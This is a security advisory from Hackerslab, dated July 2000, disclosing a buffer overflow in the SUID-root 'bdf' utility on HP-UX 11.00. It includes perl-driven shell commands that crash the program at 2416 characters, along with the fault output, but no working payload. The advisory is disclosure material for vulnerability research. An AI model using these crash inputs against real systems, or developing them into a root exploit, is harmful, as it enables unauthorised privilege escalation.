|
|
Home : Advisories : HP-UX bdf -t option buffer overflow
| Title: |
HP-UX bdf -t option buffer overflow |
| Released by: |
Hackerslab |
| Date: |
27th July 2000 |
| Printable version: |
Click here |
================================================================================
[ Hackerslab bug_paper ] HP-UX bdf -t option buffer overflow vul
================================================================================
File : /usr/bin/bdf
SYSTEM : HP-UX 11.00
Tested by HP-UX B.11.00
INFO :
bdf - report number of free disk blocks (Berkeley version)
-t type Report on the file systems of a given type (for
example, nfs or hfs).
* 'bdf' program has SUID permission.
$ ls -la `which bdf`
-r-sr-xr-x 1 root bin 24576 Apr 7 1998 /usr/bin/bdf
* Using '-t' option with long character
$ bdf -t `perl -e 'print "A"x2415'`
bdf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAA..omited...AAAAAAAAAAAAAAAA : No such file or directory
usage: bdf [ -b ] [ -i ] [ -l ] [-t type | file... ]
$ bdf -t `perl -e 'print "A"x2416'`
Memory fault
$
bash-2.04$ bdf -b -t `perl -e 'print "A"x2416'`
Segmentation fault
bash-2.04$
***
If bigger than 2415 characters, 'bdf' has Segment faulted.
Maybe.. 'bdf' has not checked string boundary.
SOLUTION
Don't know :)
==-------------------------------------------------------------------------------==
*********
* ** ** *
* ** ** *
* ******* *
* ** ** * dubhe@hackerslab.org
* ** ** * [ http://www.hackerslab.org ]
********* HACKERSLAB (C) since 2000
==-------------------------------------------------------------------------------==
|
